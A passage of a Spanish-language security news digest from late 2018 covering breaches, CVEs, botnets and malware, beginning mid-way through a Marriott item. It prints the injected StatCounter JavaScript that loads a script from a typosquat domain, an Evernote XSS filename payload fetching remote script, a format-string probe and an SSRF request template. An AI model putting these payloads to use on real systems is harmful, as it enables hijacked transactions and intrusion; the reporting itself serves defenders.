Marriott International adquirió Starwood Hotels and Resorts Worldwide por 13 billones de dólares en 2016, Incluyendo las siguientes propiedades potencialmente afectadas: St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton y Design Hotels.

Se han establecido diversos números de teléfono para que aquellos usuarios que hayan realizado una reserva en alguno de los hoteles mencionados en fechas comprendidas entre el año 2014 y el pasado 10 de septiembre de 2018 puede comunicarse con la compañía y recibir información al respecto.

Más información:
Starwood Guest Reservation Database Security Incident
https://answers.kroll.com/

500 Million Marriott Guest Records Stolen in Starwood Data Breach
https://thehackernews.com/2018/11/marriott-starwood-data-breach.html

Inyección de comandos en el lanzador de Epic Games

Se ha detectado una vulnerabilidad que podría permitir la inyección de comandos en el lanzador o ‘launcher’ de Epic Games.

Epic Games es una empresa de desarrollo de videojuegos estadounidense, bien conocida tanto por los motores de juegos Unreal Engine como por videojuegos de la talla de la serie de ‘shooters’ en primera persona Unreal, la saga Gears of War y Fortnite.

El problema se debe a un error de falta de comprobación al procesar una URI por parte del manejador del protocolo ‘com.epicgames.launcher’. Esto podría desencadenar la ejecución de una llamada al sistema compuesta por una cadena proporcionada por el usuario, que podría ser aprovechada para inyectar comandos en el contexto del usuario.

Esta vulnerabilidad permitiría a un atacante remoto ejecutar código arbitrario en instalaciones vulnerables de Microsoft Visual Studio con herramientas para el desarrollo de Unreal Engine instalado. Es necesaria la interacción del usuario para aprovechar exitosamente esta vulnerabilidad (lo que podría lograrse sin su conocimiento al ser engañado para visitar una página web maliciosa o abrir un archivo malicioso).

Esta vulnerabilidad, descubierta por el usuario ‘rgod’ de ‘9sg Security Team’, ha sido identificada como CVE-2018-17707 y puntuada con 8.8 sobre 10 debido a su peligrosidad. Ha sido corregida en la versión 8.2.2 del lanzador de Epic Games.

Más información:

Epic Games Launcher Protocol Command Injection Remote Code Execution Vulnerability
https://www.zerodayinitiative.com/advisories/ZDI-18-1359/

Nuevo minador en Linux capaz de cambiar la contraseña del administrador

A pesar de la continua caída del valor de las criptomonedas, siguen siendo un objetivo prioritario para los desarrolladores de malware. La empresa rusa de antivirus Dr.Web ha descubierto recientemente un sofisticado minador para la criptomoneda Monero (XMR) que afecta a los sistemas Linux.

Extraído de CCN.com.

Pese a que el malware diseñado para sistemas Linux aún no está muy extendido, cada vez se está volviendo más complejo y multifuncional. El malware Linux.BtcMine.174, comentado en este artículo, es una prueba de ello.

El fabricante ruso de antivirus Dr.Web ha identificado a este malware con un nombre genérico de Linux.BtcMine.174. No obstante, este troyano no tiene nada de genérico. Está diseñado para realizar una serie de acciones bien planificadas para garantizar al atacante que cumple con su fin último: minar la criptomoneda Monero.

Se trata de un script de shell de más de mil líneas de código, que en primer lugar, trata de ser el primer archivo en ejecutarse al arrancar el sistemaLinux. A continuación, busca una carpeta en la que pueda copiarse para trabajar desde ella autorreplicándose y descargándose otros módulos adicionales que amplíen sus funcionalidades.

El siguiente paso que realiza este troyano es la explotación de las vulnerabilidades CVE-2016-5195 y CVE-2013-2094, para lograr una elevación de privilegios y conseguir los permisos de root con los que hacerse con el control del sistema operativo. De este modo logra configurarse como un demon local, llegando a descargarse la utilidad nohup en caso de necesitarla.

Llegados a este punto, el Linux.BtcMine.174 ya ha logrado hacerse con el control del equipo infectado. A continuación, procede con la ejecución de su función principal: la minería de criptomonedas. Para optimizar la explotación del huésped comienza escaneando el sistema para eliminar todo malware rival que pudiera estar ya operando, y luego descarga e inicia su propia infraestructura de minería de Monero.

Al mismo tiempo descarga y ejecuta en paralelo otro malware, llamado Trojan.Linux.BillGates, un troyano capaz de realizar ataques DDoS entre otras funciones típicas de la familia Backdoor. Y para evitar su detección por parte del usuario, también busca procesos asociados con soluciones antivirus basadas en Linux, deteniéndolos al igual que hiciera previamente con el malware rival. Hasta ahora, los investigadores de Dr.Web han identificado como procesos antivirus susceptibles de ser interrumpidos por este malware: safedog, aegis, yunsuo, clamd, avast, avgd, cmdmgd, drweb-configd, drweb-spider-kmod, esets y xmirrord.

La siguiente fase del ataque consiste en descargarse y ejecutar un rootkit, y agregarse como una entrada de ejecución automática a archivos como /etc/cron.hourly, /etc/rc.local, /etc/rc.d/,… Todo ello para robar las contraseñas ingresadas por el usuario con el comando su y ocultar sus archivos dentro del sistema de archivos, conexiones de red y procesos en ejecución. Además, el malware recopilará información sobre los servidores remotos a los que el huésped se haya conectado a través de SSH con el objeto de intentar acceder a los mismos para continuar con su propagación.

Gracias a esta estrategia de robo de credenciales SSH válidas, el Linux.BtcMine.174 es capaz de autopropagarse por esta vía a la vez que dificulta la tarea de los administradores de sistema Linux para proteger adecuadamente las conexiones SSH, puesto que basta con que el malwareinfecte un host autorizado para saltarse dicha protección.

Más información:

• New Linux crypto-miner steals your root password and disables your antivirus (ZDNet)
• Virus Linux.BtcMine.174 (Dr Web)

El servicio postal de Estados Unidos expone datos de 60 millones de usuarios

El servicio postal de Estados Unidos ha corregido recientemente una vulnerabilidad crítica que exponía datos de los usuarios.

Ejecución de código remoto en Mac OS a través de Safari

Se han encontrado 3 vulnerabilidades Zero-Day que permitían la ejecución de código en el sistema a través del navegador Safari.

El equipo de seguridad ofensiva de Dropbox realizó una práctica de Red Team en la que se encontraron 3 vulnerabilidades diferentes, que juntas permitieron abrir en el sistema a través de Safari una aplicación firmada para que ejecutase otra no firmada con código malicioso.

El primero de los fallos, identificado con el CVE-2017-13890, se encontraría en la asignación de los “Core-Type” para la extensión “.smi” y sus aplicaciones autorizadas. Dicha extensión es utilizada al mismo tiempo para el Core-Type com.real.smil, empleado por Real Player y que no supondría ningún riesgo, como por el Core-Type com.apple.disk-image-smi, que corresponde a Disk Image Mounter. Al ser la extensión “.smi”utilizada por Real Player, ésta se marca como segura, a pesar de que Disk Image Mounter sí puede suponer un riesgo.

Aunque la vulnerabilidad anterior permite abrir una imagen, con el inconveniente que ello supone, es la vulnerabilidad CVE-2018-4176 en la utilidad bless la que supone un auténtico problema, al permitir ejecutar una aplicación. El fallo se encuentra en el parámetro “–openfolder” de bless, que al contrario de lo que dice su descripción, en vez de abrir el directorio contenedor con el explorador de archivos (Find), ejecuta la aplicación de la ruta si ésta fuese un bundle con extensión “.bundle”.

A pesar de todo, y aunque con la anterior vulnerabilidad ya es posible ejecutar una aplicación, Mac OS incluye una medida de seguridad adicional que impide la ejecución de aplicaciones no firmadas que se hayan descargado desde Safari. En caso de abrir una aplicación no firmada, Gatekeeper, el encargado de esta medida de seguridad, muestra una advertencia e impide la ejecución. No obstante, Gatekeeper sí permite la ejecución si es una aplicación firmada, y se ha descubierto que modificando el fichero Info.plist del bundle (lo cual no invalida la firma) es posible asociar una nueva extensión para permitir la ejecución de un programa, y que Gatekeeper no controla si dicho programa está firmado o no. Se ha asignado el identificador CVE-2018-4175 a dicha vulnerabilidad, y ha podido comprobarse su funcionamiento ejecutando un script no firmado a través de un bundle modificado que ejecuta la aplicación Terminal del sistema.

Los fallos fueros corregidos en la actualización de marzo de este año. Las versiones actualizadas son MacOS High Sierra 10.13.4, Security Update 2018-002 Sierra, y Security Update 2018-002 El Capitan. En caso de no haber recibido alguna de estas actualizaciones en su momento, se urge actualizar lo antes posible.

Más información:

Offensive testing to make Dropbox (and the world) a safer place:
https://blogs.dropbox.com/tech/2018/11/offensive-testing-to-make-dropbox-and-the-world-a-safer-place/

About the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan:
https://support.apple.com/en-us/HT208692

Ejecución de código en Atlantis Word Processor

Los investigadores de seguridad de Cisco Talos han descubierto múltiples vulnerabilidades en el procesador de textos Atlantis que permiten a los atacantes ejecutar código arbitrario en los sistemas remotamente.

Atlantis es una alternativa a Microsoft Word que permite alos usuarios crear, leer y editar documentos de Word. También se usa para la conversión a distintos formatos como por ejemplo: TXT, RTF, ODT, DOC, WRI, DOCX o ePub.

El equipo de Talos ha liberado tres pruebas de concepto para la corroboración de la vulnerabilidad.

• CVE-2018-4038: cálculo incorrecto del tamaño del buffer, vulnerabilidad que reside en el analizador del formato del documento.
• CVE-2018-4039: validación incorrecta, vulnerabilidad que permite un bufferoverflow en la implementación de los PNG por parte de la aplicación.
• CVE-2018-4040: variable no inicializada, vulnerabilidad que reside en el analizador del formato de texto enriquecido.

Todas estas vulnerabilidades están presentes para las versiones 3.2.7.1 y 3.2.7.2; y pueden ser explotadas a través de correos con ficheros adjuntos que al ser ejecutados por esta aplicación desencadenan la ejecución de código remoto.

Estas vulnerabilidades se corrigen con la actualización a la versión 3.2.10.1; por lo tanto, se recomienda actualizar a la versión indicada para corregir estos fallos de seguridad, así como no abrir ficheros adjuntos de remitentes desconocido y disponer de las medidas básicas de seguridad en nuestros sistemas.

Mas información:

Detalles técnicos
https://blog.talosintelligence.com/2018/11/Atlantis-Word-Processor-RCE-vulns.html

Fuente
https://thehackernews.com/2018/11/word-processor-vulnerability.html

Fuga accidental de contraseñas en Instagram

La red social Instagram revela por error las contraseñas de parte de sus usuarios.

El problema reside en la nueva opción para descargar el histórico de la actividad de los usuarios, que almacenaba la contraseña en texto plano en los servidores de Facebook. Este histórico contiene (entre otra información) fotografías, comentarios, posts y en definitiva toda la actividad que el usuario genera dentro de la red social.

Recordemos que esta nueva funcionalidad es obligatoria para cumplir con la normativa Europea que regula la privacidad de los usuarios; la GDPR (General Data Protection Regulation), que fue implantada tras el escándalo de Cambridge Analytica.

Para prevenir accesos no autorizados a la descarga de dicho histórico, Instagram pide antes confirmación de la credencial de acceso del usuario. Sin embargo, las contraseñas en texto plano quedaban incluidas en la URL y posteriormente se almacenaban en los servidores de Facebook debido a un fallo de seguridad. Este problema fue descubierto por el propio equipo de Instagram.

La compañía ha solucionado el problema con rapidez y a través de un comunicado esclarecen que las contraseñas ya se han borrado de los servidores de Facebook. Posteriormente se comenzó a notificar a los usuarios afectados para que cambien sus contraseñas a la mayor brevedad posible, borren la caché del navegador y habiliten la verificación en dos pasos. Este incidente, según el equipo de Instagram ha afectado a un número muy pequeño de usuarios.

Esta falla se suma a la ya ocurrida a finales de agosto, donde se corrigieron fallos importantes en la API de la red social que permitió a atacantes (aun desconocidos) conocer los correos electrónicos y números de teléfono de usuarios famosos de alto perfil.

Botnet IoT infecta 100.000 routers para enviar spam

Una nueva botnet IoT, bautizada como ‘BCMUPnP_Hunter‘, ha sido descubierta infectando routers para enviar correos electrónicos de spam.

Los investigadores de seguridad Hui Wang y RootKiter han descubierto recientemente una botnet IoT que infecta routers de diferentes marcas con el objetivo de enviar correos eléctronicos de spam a diferentes servicios de correo electrónico, como Hotmail, Outlook o Yahoo.

Esta botnet se ha bautizado con el nombre de ‘BCMUPnP_Hunter‘ debido al modo con el que infecta los routers. Para infectar a los routers, este malware hace uso de una vulnerabilidad de seguridad en la implementación del protocolo UPnP en los chips BroadCom encontrada en octubre de 2013. Esta vulnerabilidad de seguridad es del tipo ‘format string‘, por lo que permite al atacante explotar dicha vulnerabilidad para obtener y modificar información contenida en la memoria del proceso. Concretamente, esta vulnerabilidad se encuentra en la función SetConnectionType, que es accesible a través de una petición SOAP.

Si en el parámetro NewConnectionType se incluye una cadena de texto que incluya un especificador de formato (para las funciones de formato en C suelen venir precedidos por ‘%’, como por ejemplo: ‘%s’, ‘%d’, etc.), entonces ese especificador de formato será interpretado y utilizado por el programa. Esto permite a un atacante obtener información contenida en la memoria o modificarla (usando el especificador de formato ‘%n’). Por ejemplo, si enviamos ‘%x,%x’ como valor para el parámetro NewConnectionType, recibiremos como respuesta los dos primeros elementos en la pila de memoria del proceso en formato hexadecimal.

Después de realizar un escaneo, los investigadores han detectado 116 tipos diferentes de dispositivos infectados por este malware. Puede consultarse la lista completa de dispositivos detectados en la publicación de su blog.

IoCs:
C2
109.248.9.17 “Bulgaria/BG” “AS58222 Solar Invest UK LTD” #C2&&Loader

MD5 de la muestra
9036120904827550bf4436a919d3e503

Más información:

Post de análisis de la muestra:
http://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/

Post sobre la vulnerabilidad protocolo UPnP:
http://defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt

Descubiertas vulnerabilidades de día-0 en iPhone X, Samsung Galaxy S9 y Xiaomi Mi6

Hackers consiguen comprometer la seguridad de dispositivos móviles durante la prestigiosa competición Pwn2Own, celebrada en Tokio.

Pwn2Own es uno de los concursos de hacking ético más populares, se lleva celebrando desde el año 2007 durante la conferencia de seguridad PacSec; está organizada por Trend Micro’s Zero Day Initiative (ZDI) y se reparten cuantiosos premios en metálico a los concursantes que consigan explotar nuevas vulnerabilidades en dispositivos y software (actualizado) de uso general.

La competición se divide en cinco categorías: Navegadores, Distancia corta, Mensajería, Baseband e IoT:

Equipos de hackers de diversas las nacionalidades o representando a compañías de ciberseguridad fueron capaces de encontrar hasta 18 vulnerabilidades de día cero (0-days) en dispositivos móviles de Apple, Samsung y Xiaomi. Junto con los correspondientes exploits que permitían tomar el control total del dispositivo.

Apple iPhone X con iOS 12.1

El equipo compuesto por los investigadores Richard Zhu y Amat Cama (Fluoroacetate Team) descubrieron y explotaron una combinación de dos vulnerabilidades en iOS; La primera de ellas es un fallo just-in-time (JIT) en el navegador iOS de Safari junto con una escritura “out-of-bounds” (escritura fuera de un cierto límite) en el sandbox de Safari que les permitió descargar una imagen del dispositivo. Con este trabajo, Fluoroacetate ganó 50.000$.

Samsung Galaxy S9

De nuevo, el equipo Fluoroacetate consiguió explotar un heap overflow en el baseband del terminal que permitía la ejecución de código arbitrario en el terminal. Con este bug, el Team Fluoroacetate logró embolsarse otros 50.000$

El Team MWR descubrió también otras tres vulnerabilidades diferentes para este mismo dispositivo, que forzaban al terminal a visitar un portal captativo sin interacción del usuario. Después, usaron una redirección insegura junto con un fallo en la carga de aplicaciones para instalar una app maliciosa. Esta hazaña les supuso una recompensa de 30.000$.

Xiaomi Mi6

Fluorocetate continuó al día siguiente con este terminal y encontraron un integer overflow en el motor javascript del navegador web de Xiaomi Mi6 que les permitió copiar una imagen de prueba del dispositivo y con ello volver a ganar otros 25.000$. Este equipo logró encontrar otra vulnerabilidad más a través de NFC usando la capacidad touch-to-connect (tocar para conectar) del dispositivo, forzando al terminal a que abra el navegador web y visite un sitio web especialmente preparado para comprometer completamente el terminal móvil, con esta última vulnerabilidad ganaron 30.000$.

El Team MWR Labs logró combinar cinco bugs diferentes para instalar silenciosamente una app vía JavaScript y bypaseando la lista blanca de aplicaciones para lanzar automáticamente una aplicación maliciosa. Para lograrlo, MWR forzó al navegador por defecto del dispositivo a que visite un sitio web malicioso una vez que el terminal se conecta a un punto de acceso wireless malicioso. Con esta vulnerabilidad, el Team MWR consiguió 30.000$.

En el segundo día, el Team MWR combinó un fallo en las descargas del dispositivo junto con un bug que permitía la instalación silenciosa de cualquier app, para exfiltrar una fotografía de prueba en este dispositivo.

Laboratorio Hispasec.

Más información:

PWN2OWN TOKYO 2018
https://www.zerodayinitiative.com/blog/2018/11/13/pwn2own-tokyo-2018-day-one-results

https://www.zerodayinitiative.com/blog/2018/11/14/pwn2own-tokyo-2018-day-two-results-and-master-of-pwn

Múltiples vulnerabilidades en D-LINK Central WifiManager

Se han hecho públicas 3 vulnerabilidades que afectan a D-LINK Central WifiManager CWM-100 y que podrían permitir ejecutar código arbitrario con altos privilegios, realizar ataques de rebote FTP y ataques Server Side Request Forgery.

Central WiFiManager es una herramienta de D-Link que permite a los administradores gestionar y supervisar de forma remota múltiples puntos de acceso inalámbricos. Central WiFiManager es una herramienta basada en la web, por lo que se puede utilizar tanto instalada en un ordenador local como alojada en la nube.

La primera vulnerabilidad, identificada como CVE-2018-15515, permitiría ejecutar código arbitrario con permisos de ‘SYSTEM’ a través de una librería DLL creada a tal efecto. Dicha librería de 32 bits debe ser renombrada como ‘quserex.dll’ y copiada al directorio ‘CaptivelPortal’, y por último reiniciar el servicio ‘CaptivelPortal’ para que ejecute el código contenido en la DLL. Esta vulnerabilidad podría ser aprovechada por troyanos y otros tipos de malware.

Como prueba de concepto se propone ejecutar el siguiente programa (que simplemente muestra un mensaje) y observarlo con un monitor de procesos para verificar el usuario y los permisos con que se ejecuta.

La segunda vulnerabilidad permitiría realizar ataques de rebote FTP que consisten en aprovechar un fallo en el protocolo FTP mediante el cual se podría utilizar el comando PORT para escanear puertos utilizando el servidor FTP vulnerable como intermediario. De tal manera, de cara a las víctimas, los escaneos se originarían en la red en la que se encuentra el servidor FTP vulnerable. A esta vulnerabilidad se le ha asignado el identificador CVE-2018-15516.

Como prueba de concepto se propone el siguiente vídeo: https://vimeo.com/299797225.

Por último, el identificador CVE-2018-15517 se ha asignado a una vulnerabilidad que afecta a la función ‘MailConnect’ que, aunque está diseñada para verificar la conexión a un servidor SMTP, permite conexiones TCP salientes a cualquier puerto en cualquier dirección IP. Esto permitiría realizar ataques Server Side Request Forgery (SSRF) a través de peticiones del tipo:

https://DIRECCION-IP/index.php/System/MailConnect/host/DIRECCION-IP-VICTIMA/port/secure/

Estas vulnerabilidades, descubiertas por John Page (aka hyp3rlinx), afectan a la versión 1.03 r0098 de D-LINK Central WifiManager (CWM 100).

Más información:

CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt

CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt

CVE-2018-15516 / D- LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt

Reveladas siete nuevas variantes de los ataques Meltdown y Spectre

El trabajo de investigación conjunto entre la Universidad pública de Williamsburg, la Universidad tecnológica de Graz, el grupo de investigación DistriNet y la KU de Lovaina junto con algunos de los expertos que idearon los ataques de Meltdown y Spectre dio lugar al descubrimiento de siete nuevos ataques, variantes de Meltdown y Spectre.

Estos nuevos ataques se basan en una técnica conocida como “transient execution” o “ejecución transitoria”, utilizada en procesadores modernos para aumentar la concurrencia y con ella la velocidad de procesado. El ataque, permite revelar información de la memoria física inaccesible por el usuario, mediante la observación del estado de la microarquitectura y su posterior transferencia a un estado arquitectónico.

Los nuevos ataques son dos son variantes de Meltdown y cinco de Spectre.

Meltdown-PK (Protection Key Bypass)
Permitiría romper el aislamiento PKU (Clave de protección de la memoria de usuario) para leer y escribir en un espacio protegido. Este mecanismo de protección está presente en chips Intel Skylake-SP y requeriría una actualización del hardware para solventar el fallo.

Meltdown-BR (Bounds Check Bypass)
Permitiría revelar información a través de las excepciones producidas por el módulo de verificación de límites (Bound Range Exceptions) en chips de Intel y AMD.

Spectre-PHT (Pattern History Table)
Estos ataques explotan la tabla de historial de patrones para revelar información oculta. Se distinguen tres variantes, dependiendo de la rama que se esté explotando y la localización de la información revelada.

• Spectre-PHT-CA-OP (Cross-Address-space Out of Place): dentro de un espacio de direcciones controlado por el atacante.
• Spectre-PHT-SA-IP (Same Address-space In Place): dentro del mismo espacio de direcciones y la misma rama que se está explotando.
• Spectre-PHT-SA-OP (Same Address-space Out of Place): en el mismo espacio de direcciones pero en distinta rama.

Por último, otras dos variantes basadas en la explotación del búfer de la rama de destino (BTB).

Specter-BTB (Branch Target Buffer)

• Specter-BTB-SA-IP (Same Address-space In Place): en mismo espacio de direcciones y la misma rama que se está explotando.
• Specter-BTB-SA-OP (Same Address-space Out of Place): en mismo espacio de direcciones con una rama diferente.

Chips de AMD, ARM e Intel son vulnerables a estas cinco variantes de Spectre.

Los fabricantes fueron notificados de manera responsable por los investigadores y están trabajando en una solución para mitigar estos ataques.

Más información:

A Systematic Evaluation of Transient Execution Attacks and Defenses
https://arxiv.org/abs/1811.05441

Transient Execution Attacks
https://gruss.cc/files/vusec18.pdf

Usas un dron DJI? Es posible que tu información sensible esté en peligro

Investigadores de CheckPoint han revelado detalles de una vulnerabilidad en la aplicación web de DJIque podría haber permitido a un atacante acceder a cuentas de usuario y sincronizar información sensible como: registros de vuelo, ubicación, vídeo de cámara en vivo y fotos tomadas.

El equipo de DJI a pesar de estar informado de esta vulnerabilidad desde marzo, no ha puesto solución a la misma hasta hace menos de dos meses.

Introducción:

La vulnerabilidad en cuestión se valía de tres ataques diferentes para conseguir acceder a las cuentas de las victimas. Vamos a explicar algunos conceptos usados durante el análisis del fallo para que se comprenda mejor:

• Atributos de las cookies: Las cookies de sesión tienen una serie de indicadores que mejoran la seguridad de las mismas. Principalmente son tres:
  • Secure: Obliga a que la cookie se envíe solo mediante comunicaciones seguras y encriptadas.
  • HTTPOnly: Especifica que la cookie solo es accesible mediante el protocolo HTTP.
  • Same-site: Impide que el navegador envíe la cookie cuando la petición es originada desde un dominio externo. (No está relacionada con la vulnerabilidad que vamos a comentar).
• XSS (Cross-site Scripting): Vulnerabilidad web que consiste en inyectar código JavaScript. Hay dos tipos:
  • Reflejado: Consiste en editar los valores que se pasan mediante URL.
  • Persistente: Consiste en insertar código HTML en sitios que lo permitan, de manera que este queda visible antes cualquier usuario que lo visite.

Explicación de la vulnerabilidad:

Debido a una vulnerabilidad XSS persistente en el foro de DJI, un atacante podía inyectar un enlace con código malicioso que robara las cookies de sesión de la víctima que accediera. Estas al no tener correctamente configurados los atributos Secure y HTTPOnly, permitían al atacante reutilizarlas para tomar el control de la cuenta web DJI del usuario, de las aplicaciones móviles y de la plataforma centralizada de gestión de operaciones con drones llamada DJI Flighthub.

Sin embargo, para acceder a la cuenta comprometida en las aplicaciones móviles no valía solo con los hechos mencionados. Los atacantes además debían interceptar el tráfico de la aplicación móvil, y gracias a un fallo en la configuración de la implementación SSL, y mediante un ataque de hombre en el medio (MitM) conseguían el acceso.

Recomendaciones:

A pesar de que DJI ha asegurado que no ha encontrado evidencias de que el fallo se haya estado explotando más allá de los laboratorios de CheckPoint, si eres usuario de la empresa y has dado clic en algún enlace sospechoso del foro, se lo hagas saber de inmediato al soporte técnico.

Más información:

Report realizado por CheckPoint:
https://research.checkpoint.com/dji-drone-vulnerability/

XSS persistente en Evernote te abre paso a ejecutar programas en Windows

Una nueva vulnerabilidad XSS persistente en la versión de escritorio de Windows permite ejecutar programas en la máquina de la víctima de forma remota si lo combinas con otros ataques, en este caso Read Local File y Remote Command Execute.

El fallo se produce cuando un usuario añade una imagen a alguna nota. Si cambia el nombre de la imagen por código JavaScript, se ejecuta. Teniendo en cuenta que al guardar la nota queda almacenado el código JavaScript inyectado, nos encontramos con un XSS persistente.

A partir de esta vulnerabilidad es posible realizar otros ataques. Puesto que Evernote utiliza NodeWebKit para sus presentaciones de notas, es posible ejecutar un script desde un servidor remoto escrito en Node.js que lea ficheros en la máquina Windows del usuario que abra la nota en modo presentación.

><script src="http://example.org/bad-javascript.js">.jpg

Un usuario malicioso puede utilizar la opción Work Chat de Evernote para enviar la nota a la víctima y persuadirla para que la abra en modo presentación.

En una POC realizada por TonQing Zhu se muestra cómo explotando esta vulnerabilidad se pueden leer ficheros de la máquina de la víctima, en este caso el fichero ‘win.ini’ y ejecutar programas, como por ejemplo, la calculadora.

Envío de nota por Work Chat de Evernote:

El fallo ha sido clasificado como CVE-2018-18524, y fue parcheado inicialmente en Evernote para Windows 6.16.1 beta en octubre. Y la actualización con el último parche se lanzó a principios de este mes con versión 6.16.4.

Más información:

prodefence.org:
http://www.prodefence.org/xss-flaw-in-evernote-allows-attackers-to-execute-commands-and-steal-files/

movaxbx.ru:
https://movaxbx.ru/2018/11/05/evernote-for-windows-read-local-file-and-command-execute-vulnerabilities/

Los secuestros BGP del gobierno de China

El gobierno Chino secuestró tráfico de red de usuarios de EEUU para ser redirigido hacía el país Chino.

La Naval War College de los Estados Unidos ha publicado un artículo en el que se evidencia como el gobierno de China (a través del proveedor de servicios China Telecom) redirigió en múltiples ocasiones el tráfico de internet de parte de los usuarios de Estados Unidos hacia China, mediante la técnica de secuestro BGP.

BGP (Border Gateway Protocol) es un protocolo clave en las comunicaciones de internet. Este protocolo es utilizado para intercambiar información de enrutamiento entre los distintos proveedores de servicios registrados en internet. Garantizando que dichas rutas estén libres de bucles y representan el camino más corto entre dos extremos de una comunicación.

En el artículo, se resalta como en 2015 Estados Unidos y China alcanzaron un acuerdo por el cual se pretendían reducir los ciberataques directos entre ambas potencias. Dicho acuerdo pareció tener impacto en el número de ataques que ambos países recibían.

Sin embargo, este acuerdo no contempla los cada vez más frecuentes ataques de secuestro BGP que suelen sufrir en general los países del oeste.

¿ Cómo funciona un ataque de secuestro de rutas BGP ?

Internet se basa en la interconexión de otras muchas redes de forma más o menos jerárquica. En los routers frontera de cada una de esas redes, funciona el protocolo BGP, encargado como ya hemos comentado de encaminar el tráfico por una u otra red, dependiendo de cual sea el camino más corto hasta llegar a un determinado destino.

Un ataque de secuestro BGP ocurre cuando un router frontera de una de estas redes anuncia de forma intencionada (o por un fallo de configuración) rutas pertenecientes a otra red distinta como si fuese una ruta propia.

Si esta falsa afirmación es aceptada por el resto de redes vecinas, entonces el tráfico se encaminará al atacante en lugar de su destino legítimo.

Laboratorio Hispasec.

Más información:

“https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca”

“http://redestelematicas.com/arquitectura-de-internet”

“https://es.wikipedia.org/wiki/Border_Gateway_Protocol”

Explicando el 0-day de VirtualBox

La vulnerabilidad permite al malware escapar de la máquina virtual al equipo anfitrión.

El descubridor del fallo es el investigador de seguridad Sergey Zelenyuk, el cual, al estar en desacuerdo con la situación actual del mercado de Bug Bounty, decidió publicar el fallo.

Información referente al 0-day:

• Software vulnerable: Todas las versiones de VirtualBox hasta la actualidad (5.2.20)
• Sistema operativo anfitrión: Cualquiera.
• Sistema operativo invitado: Cualquiera.
• Configuración de red: Intel PRO / 1000 MT Desktop (82540EM) en modo NAT. Destacar que esta es la configuración que trae por defecto VirtualBox.

Introducción:

Antes de comenzar con la explicación de la vulnerabilidad, creo que hay que aclarar varios conceptos relacionados con el software vulnerado necesarios para el entendimiento total del fallo.

• E1000: Hace referencia al dispositivo de red virtual Intel PRO / MT Desktop (82540EM).
• LKM: Módulo del kernel de Linux.
• Descriptores Tx: Los descriptores Tx o de transmisión se encargan de almacenar metainformación de los paquetes enviados a través del adaptador. Esta metainformación puede ser: el tamaño del paquete, la etiqueta VLAN, los indicadores habilitados para la segmentación TCP/IP, etc.La configuración de red utilizada en la vulnerabilidad proporciona tres tipos de descriptores Tx:
  • Legacy: Ya no se utiliza.
  • Contexto: Se encargan de establecer el tamaño máximo de paquete y la segmentación TCP/IP.
  • Datos: Contienen direcciones físicas de paquetes de red y sus tamaños.

Un punto a destacar es que normalmente, los descriptores de contexto se suministran a la tarjeta de red antes que los descriptores de datos, y en estos se debe especificar un tamaño máximo de paquete mayor que el tamaño del descriptor de datos.

Resumen de la vulnerabilidad:

Debido a la configuración de E1000 es posible, mediante el envío de una cadena de descriptores Tx específicos, conseguir un desbordamiento de búfer (comúnmente conocido como buffer overflow), el cual concluye en dos posibilidades (ambas usadas en la explotación):

• Los datos se leerán desde el invitado en un búfer de almacenamiento dinámico.
• Copia de datos de una longitud específica al búfer sin ninguna verificación.

Además, el exploit utilizado por Zelenyuk hace uso del LKM para cargar un sistema operativo invitado. Como se requiere escalada de privilegios para conseguir cargar el controlador en ambos sistemas, hace uso de cadenas de explotaciones publicadas en el concurso Pwn2Own.

Estas cadenas explotan un navegador que abre un sitio web malicioso en el sistema operativo invitado, el cual consigue escapar de la sandbox para obtener acceso total al anillo 3 (nivel de aplicación).

Finalmente, y gracias a vulnerabilidades conocidas, consigue escalada de privilegios para acceder al anillo 0 (nivel de kernel) donde está todo lo necesario para atacar a un hipervisor desde el sistema operativo invitado.

Recomendaciones:

En primer lugar, estar muy atentos a la espera de una nueva actualización por parte del equipo de VirtualBox que arregle este fallo.

En segundo lugar, se recomienda no utilizar la configuración de red especificada al comienzo del artículo para asegurar la seguridad del equipo anfitrión.

Más información:

Explicación del 0-day por parte de Sergey Zelenyuk:
https://github.com/MorteNoir1/virtualbox_e1000_0day/blob/master/README.md

Secuestran el JavaScript de StatCounter para el robo de criptomonedas

Mediante un ataque de envenenamiento de caché el grupo de ciber-delincuentes han conseguido modificar el código JavaScript de StatCounter para traspasar Bitcoins desde una cartera a otra. El ataque parece estar dirigido hacia el conocido exchange ‘Gate.io’, quien afirma que ninguno de sus usuarios parece haber sido afectado.

StatCounter es una conocida herramienta para el análisis del tráfico web. Al rededor de 3 millones de páginas web en todo el mundo utilizan esta herramienta para obtener estadísticas sobre sus visitantes.

Investigadores de ESET descubrieron que el código JavaScript que se insertaba en las páginas de Gate.io había sido modificado. El código malicioso se encontraba en el componente ‘statcounter.com/counter/counter.js’ y trataba de interceptar y redirigir las transacciones de Bitcoin que tenían lugar en la popular plataforma de trading.

El fragmento de código introducido por los atacantes, comprueba si la URL que visita la víctima coincide con la cadena ‘myaccount/withdraw/BTC’ (correspondiente a una operación de retirada de Bitcoins). En caso afirmativo, se carga otro fragmento de código incluido en ‘https://www.statconuter[.]com/c.php’. Notar que el dominio puede parecer legítimo a simple vista, pero en realidad se intercambian las letras ‘n’ y ‘u’.

myselfloc = '' + document.location;
if (myselfloc.indexOf('myaccount/withdraw/BTC') > -1) {
  var ga = document.createElement('script');
  ga.src = 'https://www.statconuter.com/c.php';
  ga.setAttribute('async', 'true');
  document.documentElement.firstChild.appendChild(ga);
}

